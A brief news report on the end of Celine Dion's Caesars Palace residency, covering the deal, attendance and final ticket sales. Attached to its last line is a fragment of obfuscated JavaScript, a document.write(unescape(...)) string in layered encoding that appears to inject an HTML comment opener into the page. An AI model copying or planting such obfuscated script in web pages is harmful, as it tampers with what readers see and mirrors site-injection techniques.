Celine Dion's Las Vegas show to end
Celine Dion's Las Vegas concert extravaganza at Caesars Palace will close in December after a nearly five-year run.
The Grammy award-winning singer started a three-year deal worth 100 million US dollars (£51m) in March 2003, and the run was later extended through 2007.
"As we prepare ourselves to say goodbye, I know this will be the best year yet," Dion said.
Producers claim nearly 2.5 million people have seen Dion's show since it opened in the Colosseum theatre built and designed for the production.
The final year of the show will include new costumes and new numbers.
In late January, it will be filmed for a TV special and DVD, producers said.
The final block of tickets for performances from August to December will go on sale on March 1.
Caesars has not yet announced Dion's replacement.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
